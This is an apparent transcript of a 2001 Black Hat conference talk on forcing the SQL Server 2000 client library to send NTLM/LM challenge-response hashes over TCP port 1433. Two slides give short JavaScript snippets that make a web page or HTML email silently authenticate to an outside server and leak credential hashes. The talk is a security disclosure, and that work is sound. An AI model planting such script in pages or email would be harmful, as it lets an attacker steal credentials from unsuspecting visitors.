1 / 13

Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel…

Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel…. Timothy M. Mullen AnchorIS.Com, Inc. thor@hammerofgod.com. The Culprit: SQL2000 Super Sockets Lib. New functions in dbnetlib.dll! Supports TCP/IP Sockets, encryption, authentication, etc.

otis
Download Presentation

Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel…

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Grabbin’ Creds:Forcing SQL libs to deliver LM/NT challenge and response on the back channel… Timothy M. Mullen AnchorIS.Com, Inc. thor@hammerofgod.com Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  2. The Culprit:SQL2000 Super Sockets Lib • New functions in dbnetlib.dll! • Supports TCP/IP Sockets, encryption, authentication, etc. • Default library on workstations that have SQL2k client utilities installed. (MSDE as well?) Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  3. Backgrounders… • SQL 7 also supported TCP/IP sockets, but only for Mixed Mode authentication (SQL maintained its own accounts) • Integrated Authentication (NTLM Creds) needed Named Pipes • Named Pipes required 139/445 open to authenticating system. Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  4. Backgrounders… cont. • Integrated Authentication has _always_ been the recommended configuration. • 139/445 has long been blocked at the router (if not, you are a yum-yum.) • Many server-to-server apps authenticate over TCP 1433 because it is “safe” . Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  5. The Skinny • DBNETLIB now directly supports integrated authentication over standard TCP/IP sockets – default port 1433. • The LM/NTLM challenge/response pairs can now be sent out via 1433 (other other ports if changed) Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  6. The Problem • Many routers, though specifically blocking 139/445, still allow established traffic out- I.e. 1433 outbound is free to pass. • Many have 1433 explicitly open for application support, server-to-server queries, etc. Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  7. The Sting • Client side ODBC connections can specify the target server, authentication type, and the library to use. • Web sites can request client to perform ADODB recordset requests, as well as other tasks. • HTML email as well. Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  8. Somewhat Lame Example • Web site with following tag: { conn=new ActiveXObject("ADODB.Connection"); conn.ConnectionString='Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib'; conn.Open(); } Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  9. Example Cont… • User is presented with “This page is accessing a data source from another domain. Do you want to allow this?” dialog box. • Easily engineered around… Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  10. Not So Lame Example • Lets try this one: { ns = new ActiveXObject("SQLNS.SQLNamespace"); ns.Initialize ("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll"); } Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  11. What’s the difference? • SQLNamespace, SQL Distribution Control, and SQL Merge control are all scriptable, and are marked _safe for scripting_ ! • Silently grab the creds for fun and profit! Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  12. Live Demo • Don’t try this at home! Professional driver on closed course. Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  13. Thanks! AnchorIS.Com www.anchoris.com HammerofGod www.hammerofgod.com Timothy M. Mullen tmullen@anchoris.com thor@hammerofgod.com Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

More Related